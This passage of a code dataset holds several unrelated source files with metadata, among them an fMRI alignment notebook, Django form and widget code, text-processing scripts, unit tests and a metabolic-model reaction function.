30(9): 1345-1365.\n#\n# Participants were shown clips from the film _Grand Budapest Hotel_ in either a fixed or temporally scrambled order. Of those clips shown temporally scrambled, the scrambling could either be consistent or inconsistent across runs. These three conditions were presented over three runs, and are depicted graphically in the following figure.\n#\n# \n#\n# _Figure 1._ Experimental design. Figure reproduced from Aly et al (2018).\n\n# %% [markdown]\n# Data were downloaded from OpenNeuro and pre-processed with [fMRIPrep](http://fmriprep.readthedocs.io) [1.5.0-rc1](https://github.com/poldracklab/fmriprep/releases/tag/1.5.0rc1) using a generated Singularity image deployed on Compute Canada infrastructure.\n# Specifically, the following flags were provided:\n#\n# ```\n# singularity run -B ${DATADIR}:/data:ro \\\n# -B ${OUTDIR}:/out \\\n# -B ${SIMGDIR}/license.txt:/license/license.txt:ro \\\n# ${SIMGDIR}/fmriprep-1.5.0rc1.simg \\\n# /data /out participant \\\n# --participant-label sub-${sub} \\\n# --output-space fsaverage5 template \\\n# -w /out/workdir \\\n# --notrack \\\n# --fs-license-file /license/license.txt\n# ```\n#\n# Generated reports were visually inspected for functional-anatomical coregistration.\n# Importantly, these data were originally collected for a study that focused on the long-axis of the hippocampus.\n# Therefore, the selected field-of-view excludes large portions of prefrontal cortex and cerebellum.\n# An example visual report output is as shown below:\n#\n# \n#\n# _Figure 2._ An example visual report generated by fMRIPrep for ds1545.\n\n# %% [markdown]\n# ## Accessing the dataset and selecting a region-of-interest\n#\n# First, we'll need to download the preprocessed data.\n# This data is [currently hosted](https://osf.io/vgj7w/) on the Open Science Framework (OSF), and we can access it using a simple [Nilearn-style](https://nilearn.github.io) fetcher.\n\n# %%\nfrom fetch_data import fetch_mtl_fmri\n\n# Here, we're using the nickname MTL for the Medial Temporal Lobe,\n# since the original publication with ds1545 focused on this region\nmtl = fetch_mtl_fmri(n_subjects=2, n_runs=2)\n\n# %% [markdown]\n# Given the limited field-of-view, in this notebook we will focus our investigations on regions of interest (ROIs) within the ventral visual stream.\n# We can select an ROI previously defined by Haxby and colleagues (2001) in the ventral temporal cortex.\n# We'll access this ROI with Nilearn.\n\n# %%\nfrom nilearn import (datasets, image, plotting)\n\natlas_schaefer_2018 = datasets.fetch_atlas_schaefer_2018(\n n_rois=800, yeo_networks=17, resolution_mm=2)\natlas = image.load_img(atlas_schaefer_2018.maps)\nmask = image.new_img_like(atlas, atlas.get_data() == 5)\nresampled_mask = image.resample_to_img(\n mask, image.mean_img(mtl.func[0]), interpolation=\"nearest\")\n\n# %%\n# %matplotlib inline\nfrom nilearn.input_data import NiftiMasker\n\nroi_masker = NiftiMasker(mask_img=resampled_mask).fit()\nroi_masker.generate_report()\n\n# %% [markdown]\n# ## Defining and running the alignment\n#\n# We'll need to define our `source` and `target` datasets for alignment.\n# Since we'd like to learn about the relative accuracy of the different methods being compared,\n# we'll also define a `train` and `test` loop.\n#\n# To keep our investigations computationally tractable, we'll only use the first ten volumes for each image,\n# indexed using Nilearn's `index_img` function.\n\n# %%\nimport fmralign\n\nfiles = []\nkeys = ['source_train', 'target_train', 'source_test', 'target_test']\n\nfor i, k in enumerate(keys):\n files.append(image.index_img(mtl.func[i], index=slice(0,10)))\n \ndata = dict(zip(keys, files))\n\n# %% [markdown]\n# Alignment is performed in local neighborhoods, so we'll first parcellate our functional scans using [ReNA clustering](https://arxiv.org/abs/1609.04608).\n# Because we don't want our parcels to be overly large —as this would signifcantly increase the computational cost— we'll explictly set the number of parcels.\n# In this case, we'll set the number of parcels such that each contains approximately 200 voxels.\n\n# %%\nimport warnings\nwarnings.simplefilter(action='ignore', category=(DeprecationWarning,\n FutureWarning,\n UserWarning))\n\nfrom fmralign.pairwise_alignment import PairwiseAlignment\nfrom fmralign._utils import voxelwise_correlation\nmethods = ['identity', 'scaled_orthogonal', 'ridge_cv']\n\nfor method in methods:\n alignment_estimator = PairwiseAlignment(alignment_method=method, n_pieces=1,\n clustering='rena', mask=roi_masker)\n alignment_estimator.fit(data['source_train'], data['target_train'])\n target_pred = alignment_estimator.transform(data['source_test'])\n # calculate and display the performance of the alignment estimator\n aligned_score = voxelwise_correlation(data['target_test'], target_pred, roi_masker)\n display = plotting.plot_stat_map(aligned_score,\n title=f\"Correlation of prediction after {method} alignment\")\n\n# %%\n", "sub_path": "mtl_benchmark.py", "file_name": "mtl_benchmark.py", "file_ext": "py", "file_size_in_byte": 6274, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "fetch_data.fetch_mtl_fmri", "line_number": 67, "usage_type": "call"}, {"api_name": "nilearn.datasets.fetch_atlas_schaefer_2018", "line_number": 77, "usage_type": "call"}, {"api_name": "nilearn.datasets", "line_number": 77, "usage_type": "name"}, {"api_name": "nilearn.image.load_img", "line_number": 79, "usage_type": "call"}, {"api_name": "nilearn.image", "line_number": 79, "usage_type": "name"}, {"api_name": "nilearn.image.new_img_like", "line_number": 80, "usage_type": "call"}, {"api_name": "nilearn.image", "line_number": 80, "usage_type": "name"}, {"api_name": "nilearn.image.resample_to_img", "line_number": 81, "usage_type": "call"}, {"api_name": "nilearn.image", "line_number": 81, "usage_type": "name"}, {"api_name": "nilearn.image.mean_img", "line_number": 82, "usage_type": "call"}, {"api_name": "nilearn.image", "line_number": 82, "usage_type": "name"}, {"api_name": "nilearn.input_data.NiftiMasker", "line_number": 88, "usage_type": "call"}, {"api_name": "nilearn.image.index_img", "line_number": 108, "usage_type": "call"}, {"api_name": "nilearn.image", "line_number": 108, "usage_type": "name"}, {"api_name": "warnings.simplefilter", "line_number": 119, "usage_type": "call"}, {"api_name": "fmralign.pairwise_alignment.PairwiseAlignment", "line_number": 128, "usage_type": "call"}, {"api_name": "fmralign._utils.voxelwise_correlation", "line_number": 133, "usage_type": "call"}, {"api_name": "nilearn.plotting.plot_stat_map", "line_number": 134, "usage_type": "call"}, {"api_name": "nilearn.plotting", "line_number": 134, "usage_type": "name"}]} +{"seq_id": "225642609", "text": "from __future__ import print_function\nimport dxchange\nimport os\nimport scipy.misc\n\nfiles = os.listdir('betap')\nfor name in files:\n\tprint(name)\n\ta = dxchange.read_tiff('betap/'+name)\n\tprint(a.shape)\n\tscipy.misc.toimage(a, cmin=0, cmax=0.0000311).save('png/beta/'+str(os.path.splitext(name)[0])+'.png')\n\nfiles = os.listdir('deltap')\nfor name in files:\n\ta = dxchange.read_tiff('deltap/'+name)+0.0000183\n\tscipy.misc.toimage(a, cmin=-0.0000508+0.0000183, cmax=0.000127+0.0000183).save('png/delta/'+str(os.path.splitext(name)[0])+'.png')\n\n\n", "sub_path": "tmpscripts/convert_png.py", "file_name": "convert_png.py", "file_ext": "py", "file_size_in_byte": 534, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.listdir", "line_number": 6, "usage_type": "call"}, {"api_name": "dxchange.read_tiff", "line_number": 9, "usage_type": "call"}, {"api_name": "scipy.misc.misc.toimage", "line_number": 11, "usage_type": "call"}, {"api_name": "scipy.misc.misc", "line_number": 11, "usage_type": "attribute"}, {"api_name": "scipy.misc", "line_number": 11, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 13, "usage_type": "call"}, {"api_name": "dxchange.read_tiff", "line_number": 15, "usage_type": "call"}, {"api_name": "scipy.misc.misc.toimage", "line_number": 16, "usage_type": "call"}, {"api_name": "scipy.misc.misc", "line_number": 16, "usage_type": "attribute"}, {"api_name": "scipy.misc", "line_number": 16, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}]} +{"seq_id": "603173403", "text": "from django import forms\nfrom django.utils.safestring import mark_safe\nfrom django.db.models import CharField\nfrom django.conf import settings\n\n\nclass ColorPickerWidget(forms.TextInput):\n class Media:\n css = {\n 'all': (\n '/static/css/project/colorpicker.css',\n )\n }\n\n js = (\n '/static/js/project/picker-csrf.js',\n '/static//js/jquery-1.11.1.min.js',\n '/static/js/project/colorpicker.js',\n \n )\n\n def __init__(self, language=None, attrs=None):\n self.language = language or settings.LANGUAGE_CODE[:2]\n super(ColorPickerWidget, self).__init__(attrs=attrs)\n\n def render(self, id, value, attrs=None):\n rendered = super(ColorPickerWidget, self).render(id, value, attrs)\n return rendered + mark_safe(u'''''' % id)\n\n\nclass ColorField(CharField):\n def __init__(self, *args, **kwargs):\n kwargs['max_length'] = 10\n super(ColorField, self).__init__(*args, **kwargs)\n\n def formfield(self, **kwargs):\n kwargs['widget'] = ColorPickerWidget\n return super(ColorField, self).formfield(**kwargs)\n", "sub_path": "mkochman-szpila-865f30290cad/fields.py", "file_name": "fields.py", "file_ext": "py", "file_size_in_byte": 1533, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.forms.TextInput", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.settings.LANGUAGE_CODE", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 23, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "557877702", "text": "# -*- coding: utf-8 -*-\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport pickle\nimport random\nimport numpy as np\nimport os\nimport time\nimport sys\n\ndef flatten():\n cwd = os.getcwd()\n txtdir = cwd + '/occ_letters'\n print (txtdir)\n files = os.listdir(txtdir)\n doc_contents = []\n txt_names = []\n doc_names = []\n filenames = []\n for i in files:\n fname = txtdir + '/' + i\n with open(fname, 'rb') as f:\n contents = f.read()\n try:\n contents = contents.decode('utf-8')\n txt_names.append(i)\n doc_names.append(i.replace('.txt', '.pdf'))\n pdf_name = '../../../files/' + i.replace('.txt', '.pdf')\n filenames.append(pdf_name)\n doc_contents.append(contents)\n f.close()\n except:\n print ('Didnt work: {0}'.format(i))\n return doc_contents, txt_names, doc_names, filenames\n\n\n\nstart_time = time.time()\nprint (start_time)\ndoc_contents, txt_names, doc_names, filenames = flatten()\nprint ('length of contents: ', len(doc_contents))\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\nstart_time = time.time()\n\nwith open('../reglist/pickle/txt_names_occ.pickle', 'wb') as handle:\n pickle.dump(txt_names, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nwith open('../reglist/pickle/filenames_occ.pickle', 'wb') as handle:\n pickle.dump(filenames, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nwith open('../reglist/pickle/doc_names_occ.pickle', 'wb') as handle:\n pickle.dump(doc_names, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nwith open('../reglist/pickle/doc_contents_occ.pickle', 'wb') as handle:\n pickle.dump(doc_contents, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n#sys.exit()\ninput('enter')\n\ntf = TfidfVectorizer(analyzer='word',\n ngram_range=(1,3),\n min_df = 0,\n stop_words = 'english',\n token_pattern=r'\\S+',\n lowercase = True)\n\nprint ('Vectorizer complete')\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\ntfidf_matrix = tf.fit_transform(doc_contents)\nprint ('Fit_transform complete')\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\nfeature_names = tf.get_feature_names()\nprint ('Length of feature names: ', len(feature_names))\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\nstart_time = time.time()\n#--- 26.7841911316 seconds ---\n\n\n\nprint ('pickling...\\n\\n')\n\nwith open('../reglist/pickle/feature_names_occ.pickle', 'wb') as handle:\n pickle.dump(feature_names, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nwith open('../reglist/pickle/tfidf_matrix_occ.pickle', 'wb') as handle:\n pickle.dump(tfidf_matrix, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\nstart_time = time.time()\n\nwhile True:\n s = random.sample(feature_names, 10)\n print (s)\n input('enter')", "sub_path": "tfidf/occ_tfidf.py", "file_name": "occ_tfidf.py", "file_ext": "py", "file_size_in_byte": 2995, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "matplotlib.use", "line_number": 3, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 14, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 17, "usage_type": "call"}, {"api_name": "time.time", "line_number": 40, "usage_type": "call"}, {"api_name": "time.time", "line_number": 44, "usage_type": "call"}, {"api_name": "time.time", "line_number": 45, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 48, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 51, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 54, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 57, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 57, "usage_type": "attribute"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 62, "usage_type": "call"}, {"api_name": "time.time", "line_number": 70, "usage_type": "call"}, {"api_name": "time.time", "line_number": 74, "usage_type": "call"}, {"api_name": "time.time", "line_number": 79, "usage_type": "call"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 88, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 88, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 91, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 91, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 93, "usage_type": "call"}, {"api_name": "time.time", "line_number": 94, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "345211767", "text": "import json\nimport sys\nimport time\nimport fileinput\n\nclass Edge:\n\n def __init__(self, node1, node2):\n self.node1 = node1\n self.node2 = node2\n\n\nclass Node:\n\n def __init__(self, timestamp, name):\n self.timestamp = timestamp\n self.name = name\n\n\nnodes_on_timestamp = []\nglobal_edges = {}\nwrite_file = open(sys.argv[2], 'w')\n\nfor line in fileinput.input(sys.argv[1]):\n json_obj = json.loads(line)\n if \"created_at\" in json_obj:\n timestamp = time.mktime(time.strptime(json_obj[\"created_at\"], \"%a %b %d %H:%M:%S +0000 %Y\"))\n if len(nodes_on_timestamp) > 0:\n test_node = nodes_on_timestamp[0]\n while test_node is not None and timestamp - test_node.timestamp > 60:\n toReplaceEdges = global_edges\n for key in global_edges.items():\n if test_node.name in key:\n toReplaceEdges.pop(key, None)\n global_edges = toReplaceEdges\n nodes_on_timestamp.pop(0)\n if len(nodes_on_timestamp) > 0:\n test_node = nodes_on_timestamp[0]\n else:\n test_node = None\n\n if len(json_obj[\"entities\"][\"hashtags\"]) > 1:\n\n for i in range(len(json_obj[\"entities\"][\"hashtags\"])):\n first_node = Node(timestamp, json_obj[\"entities\"][\"hashtags\"][i][\"text\"])\n nodes_on_timestamp.append(first_node)\n nodes_on_timestamp = sorted(nodes_on_timestamp, key=lambda node: node.timestamp)\n for j in range(i + 1, len(json_obj[\"entities\"][\"hashtags\"])):\n second_node = Node(timestamp, json_obj[\"entities\"][\"hashtags\"][j][\"text\"])\n global_edges[first_node.name + second_node.name] = Edge(first_node, second_node)\n global_edges[second_node.name + first_node.name] = Edge(second_node, first_node)\n\n if len(nodes_on_timestamp) > 0:\n average = len(global_edges.items())/len(nodes_on_timestamp)\n write_file.write(str(round(average, 2)) + \"\\n\")\n\n\n", "sub_path": "src/average_degree.py", "file_name": "average_degree.py", "file_ext": "py", "file_size_in_byte": 2077, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "fileinput.input", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 24, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 25, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 27, "usage_type": "call"}, {"api_name": "time.strptime", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "634828396", "text": "##############################################################################\n# Institute for the Design of Advanced Energy Systems Process Systems\n# Engineering Framework (IDAES PSE Framework) Copyright (c) 2018-2019, by the\n# software owners: The Regents of the University of California, through\n# Lawrence Berkeley National Laboratory, National Technology & Engineering\n# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia\n# University Research Corporation, et al. All rights reserved.\n#\n# Please see the files COPYRIGHT.txt and LICENSE.txt for full copyright and\n# license information, respectively. Both files are also available online\n# at the URL \"https://github.com/IDAES/idaes-pse\".\n##############################################################################\n\"\"\"\nTests for idaes.vis.plotbase\n\"\"\"\n# third-party\nimport pytest\nimport pandas as pd\n# package\nfrom idaes.vis import plotbase\n\n\ndef test_plotbase_construct_abstract():\n assert pytest.raises(TypeError, plotbase.PlotBase, 'foo')\n\n\ndef test_plotregistry_construct():\n reg = plotbase.PlotRegistry()\n\n\ndef test_plotregistry_register():\n reg = plotbase.PlotRegistry()\n reg.remove_all()\n obj = \"hello\"\n plot_class = plotbase.PlotBase\n reg.register(obj, \"test1\", plot_class)\n reg.remove_all()\n\n\ndef setup_plot(plot, obj):\n return plot, obj\n\n\ndef test_plotregistry_register_setup():\n reg = plotbase.PlotRegistry()\n reg.remove_all()\n obj = \"hello\"\n plot_class = plotbase.PlotBase\n reg.register(obj, \"test1\", plot_class, setup_fn=setup_plot)\n\n\ndef test_plotregistry_register_overwrite():\n reg = plotbase.PlotRegistry()\n reg.remove_all()\n obj = \"hello\"\n plot_class = plotbase.PlotBase\n reg.register(obj, \"test1\", plot_class)\n # without overwrite: KeyError\n assert pytest.raises(\n KeyError, reg.register, obj, \"test1\", plot_class, dict(setup_fn=setup_plot)\n )\n # with overwrite: ok\n reg.register(obj, \"test1\", plot_class, overwrite=True)\n\n\ndef test_plotregistry_get():\n reg = plotbase.PlotRegistry()\n reg.remove_all()\n obj = \"hello\"\n plot_class = plotbase.PlotBase\n reg.register(obj, \"test1\", plot_class, setup_fn=setup_plot)\n result = reg.get(obj, \"test1\")\n assert result == (plot_class, obj)\n\n\nclass DummyPlot(plotbase.PlotBase):\n def __init__(self):\n super().__init__(None)\n\n def annotate(self, x, y, label: str):\n return\n\n def resize(self, height: int = -1, width: int = -1):\n return\n\n def save(self, destination: str):\n return 'filename'\n\n def show(self, in_notebook=True):\n return\n\n\n@pytest.fixture\ndef plotdf():\n return pd.DataFrame({'x': [1, 2], 'y1': [1, 2], 'y2': [1, 2]})\n\n\ndef test_validate(plotdf):\n # reject\n for bad_args, bad_kwargs in [\n ((None, None, None), {}),\n ((None, None, None), {'legend': 'i_am'}),\n ((None, 'x', []), {}),\n ((plotdf, 'x', ['z']), {}),\n ((plotdf, 'foo', ['y1']), {}),\n ]:\n plot = DummyPlot()\n result, msg = plot.validate(*bad_args, **bad_kwargs)\n assert result is False\n # pass\n for good_args, good_kwargs in [\n ((plotdf, 'x', ['y1']), {}),\n ((plotdf, 'x', ['y1', 'y2']), {}),\n ((plotdf, 'x', ['y1']), {'legend': 'foo'}),\n ]:\n plot = DummyPlot()\n result, msg = plot.validate(*good_args, **good_kwargs)\n assert result is True\n", "sub_path": "idaes/vis/tests/test_plotbase.py", "file_name": "test_plotbase.py", "file_ext": "py", "file_size_in_byte": 3411, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pytest.raises", "line_number": 24, "usage_type": "call"}, {"api_name": "idaes.vis.plotbase.PlotBase", "line_number": 24, "usage_type": "attribute"}, {"api_name": "idaes.vis.plotbase", "line_number": 24, "usage_type": "name"}, {"api_name": "idaes.vis.plotbase.PlotRegistry", "line_number": 28, "usage_type": "call"}, {"api_name": "idaes.vis.plotbase", "line_number": 28, "usage_type": "name"}, {"api_name": "idaes.vis.plotbase.PlotRegistry", "line_number": 32, "usage_type": "call"}, {"api_name": "idaes.vis.plotbase", "line_number": 32, "usage_type": "name"}, {"api_name": "idaes.vis.plotbase.PlotBase", "line_number": 35, "usage_type": "attribute"}, {"api_name": "idaes.vis.plotbase", "line_number": 35, "usage_type": "name"}, {"api_name": "idaes.vis.plotbase.PlotRegistry", "line_number": 45, "usage_type": "call"}, {"api_name": "idaes.vis.plotbase", "line_number": 45, "usage_type": "name"}, {"api_name": "idaes.vis.plotbase.PlotBase", "line_number": 48, "usage_type": "attribute"}, {"api_name": "idaes.vis.plotbase", "line_number": 48, "usage_type": "name"}, {"api_name": "idaes.vis.plotbase.PlotRegistry", "line_number": 53, "usage_type": "call"}, {"api_name": "idaes.vis.plotbase", "line_number": 53, "usage_type": "name"}, {"api_name": "idaes.vis.plotbase.PlotBase", "line_number": 56, "usage_type": "attribute"}, {"api_name": "idaes.vis.plotbase", "line_number": 56, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 59, "usage_type": "call"}, {"api_name": "idaes.vis.plotbase.PlotRegistry", "line_number": 67, "usage_type": "call"}, {"api_name": "idaes.vis.plotbase", "line_number": 67, "usage_type": "name"}, {"api_name": "idaes.vis.plotbase.PlotBase", "line_number": 70, "usage_type": "attribute"}, {"api_name": "idaes.vis.plotbase", "line_number": 70, "usage_type": "name"}, {"api_name": "idaes.vis.plotbase.PlotBase", "line_number": 76, "usage_type": "attribute"}, {"api_name": "idaes.vis.plotbase", "line_number": 76, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 95, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 93, "usage_type": "attribute"}]} +{"seq_id": "171086518", "text": "from PyQt5.QtWidgets import *\nfrom mainUi import Ui_MainMenu\nimport sys\nimport time\nimport json\n\n\nclass Creator(QMainWindow):\n def __init__(self):\n super().__init__()\n self.ui = Ui_MainMenu()\n self.ui.setupUi(self)\n self.deviceChange = self.ui.comboBox\n self.createButton = self.ui.pushButton_3\n self.deviceChange.addItem(\"Basınç Sensörü\")\n self.deviceChange.addItem(\"Kuyu Merkez Cihazı\")\n self.deviceChange.addItem(\"Hava Sensörü\")\n self.deviceChange.addItem(\"Merkezli Hava Sensörü\")\n self.deviceChange.addItem(\"Toprak Sensörü\")\n self.createButton.clicked.connect(self.olustur)\n self.typeName = str(self.deviceChange.currentText())\n self.type = str(self.deviceChange.currentIndex() - 1)\n self.dailProductionNumber = None\n self.deviceCreatedate = time.strftime(\"%y\" + \"%m\" + \"%d\")\n\n def olustur(self):\n self.checkday()\n for i in range(self.deviceChange.count()):\n if self.deviceChange.currentIndex() == i:\n self.idWrite(i)\n break\n\n\n def checkday(self):\n \"\"\"\n :param tarih: str\n \"\"\"\n with open(\"list.json\") as data_file:\n data = json.load(data_file)\n\n lastDevice = data[\"device\"][Creator.typeName][-1]\n lastDeviceDate = lastDevice[\"id\"]\n lastDeviceDailyProductionNumber = lastDevice[\"datenumber\"]\n if lastDeviceDate[0:6] != Creator.deviceCreatedate:\n self.dailyProductionNumber = 0\n else:\n self.dailyProductionNumber = lastDeviceDailyProductionNumber\n\n def idWrite(self,deviceType):\n \"\"\"\n :param chechday: boolean\n :param deviceType: int\n \"\"\"\n with open(\"list.json\") as data_file:\n data = json.load(data_file)\n date = str(Creator.deviceCreatedate)\n type = str(deviceType)\n id = str(date + type + str(self.dailyProductionNumber))\n number = str(self.dailyProductionNumber)\n send = {\"datenumber\": number,\n \"id\": id,\n \"deviceType\": type\n }\n data[\"device\"][Creator.typeName] = []\n data[\"device\"][Creator.typeName].append(send)\n with open(\"list.json\", \"w\", encoding='utf-8') as f:\n json.dump(data, f, ensure_ascii=False, indent=4)\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n Creator = Creator()\n Creator.show()\n sys.exit(app.exec())\n", "sub_path": "Creator.py", "file_name": "Creator.py", "file_ext": "py", "file_size_in_byte": 2489, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "mainUi.Ui_MainMenu", "line_number": 11, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 24, "usage_type": "call"}, {"api_name": "json.load", "line_number": 39, "usage_type": "call"}, {"api_name": "json.load", "line_number": 55, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 67, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 70, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "230076382", "text": "# -*- coding: utf-8 -*-\nimport datetime\nfrom pre_processing import *\nflag = \"\"\nprint(\"\\n输入你自己的句子,或者直接回车查看默认示例:\")\nsentence = input()\n\nwhile flag != 'exit':\n\tif not sentence:\n\t\tsentence = u\"7月19日至28日,国家主席习近平将对阿联酋、塞内加尔、卢旺达和南非进行国事访问,出席在南非约翰内斯堡举行的金砖国家领导人第十次会晤,\"\\\n\t\t\t\t\t\"过境毛里求斯并进行友好访问。此次中东非洲之行是习近平连任国家主席后的首次出访,是国际形势深刻演变背景下中国面向发展中国家的重\"\\\n\t\t\t\t\t\"大外交行动,意义重大,世界瞩目。\"\n\t\tprint(\"示例句子为:\" + sentence)\n\tstart_time = datetime.datetime.now().microsecond\t\t\t\t\n\tentity_name, entity_tags = predict(sentence)\n\tprint(\"**********识别结果**********\")\n\tprint_result(entity_name, entity_tags)\n\tend_time = datetime.datetime.now().microsecond\n\trun_time = (end_time - start_time)/1000\n\tprint(\"**********finished in %.2f ms**********\" % run_time)\n\n\tprint(\"\\n继续或输入'exit'退出\")\n\tflag = input()\n\tif flag != 'exit':\n\t\tsentence = flag\n\telse:\n\t\tflag = flag\n\nprint('\\n再见')\n\t", "sub_path": "trained_model/predict.py", "file_name": "predict.py", "file_ext": "py", "file_size_in_byte": 1187, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "datetime.datetime.now", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 14, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 18, "usage_type": "attribute"}]} +{"seq_id": "385468909", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n# urocanate reactions\ndef urocanate_reaction(model):\n import cobra\n from cobra import Model, Reaction, Metabolite\n# get the existing metabolites or creat new ones in the model\n M_his__L = model.metabolites.get_by_id('his__L_c')\n M_nh4 = model.metabolites.get_by_id('nh4_c')\n M_urcan = Metabolite(\n 'urocanate_c',\n formula = 'C6H5N2O2',\n name = 'urocanate',\n compartment = 'c')\n# add metabolites inside the biomass function\n R_biomass = model.reactions.get_by_id(\"BIOMASS_Ec_iML1515_WT_75p37M\")\n R_biomass.add_metabolites(\n {\n M_urocan: 0.000291950497833333\n\n }\n )\n# create the reaction and add metabolites inside\n# Unification Links: BRENDA:4.3.1.3, ENZYME:4.3.1.3, IUBMB-ExplorEnz:4.3.1.3\n R_HAL = Reaction('HAL')\n R_HAL.name = 'Histidine Ammonia-lyase Reaction'\n R_HAL.add_metabolites({\n M_his__L: -1.0,\n M_nh4: 1.0,\n M_urcan: 1.0})\n\n model.add_reactions([R_HAL])\n return model\n# cobra.io.sbml.write_sbml_model(model,'iML1515_urocan_reaction.xml')\n #\n\n\n# In[3]:\n\n\n# import cobra\n# from cobra import Model, Reaction, Metabolite\n# model= cobra.io.read_sbml_model('iML1515.xml')\n# urocanate_reaction(model)\n\n\n# In[ ]:\n\n\n\n\n", "sub_path": "files made by Ke/add reaction function/reaction pythonfile/urocanate_reaction_function.py", "file_name": "urocanate_reaction_function.py", "file_ext": "py", "file_size_in_byte": 1296, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "cobra.Metabolite", "line_number": 14, "usage_type": "call"}, {"api_name": "cobra.Reaction", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "67053620", "text": "# -*- coding: utf-8 -*-\nfrom django import forms\n\n\nLISTING_TYPE_CHOICES = [\n ('gold_premium', 'Diamante'),\n ('gold', 'Ouro'),\n ('silver', 'Prata'),\n ('bronze', 'Bronze'),\n ('free', 'Grátis'),\n]\n\nCONDITIONS = [\n ('new', 'Novo'),\n ('used', 'Usado')\n]\n\nBUYING_MODE = [\n ('buy_it_now', 'Vender agora'),\n ('auction', 'Leilão')\n]\n\nclass ProdutoPublicarForm(forms.Form):\n\n title = forms.CharField(max_length=128)\n subtitle = forms.CharField(max_length=256)\n description = forms.CharField(widget=forms.Textarea())\n listing_type_id = forms.ChoiceField(choices=LISTING_TYPE_CHOICES)\n condition = forms.ChoiceField(choices=CONDITIONS)\n buying_mode = forms.ChoiceField(choices=BUYING_MODE)\n price = forms.DecimalField()\n available_quantity = forms.IntegerField()", "sub_path": "loja/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 803, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.forms.Form", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 23, "usage_type": "name"}, {"api_name": 